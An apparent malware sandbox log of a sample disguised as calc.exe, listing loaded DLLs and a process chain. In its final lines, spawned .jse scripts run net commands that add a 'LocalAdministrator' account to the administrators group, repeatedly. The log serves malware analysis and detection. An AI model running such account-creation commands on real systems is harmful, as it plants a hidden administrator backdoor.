Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse | |
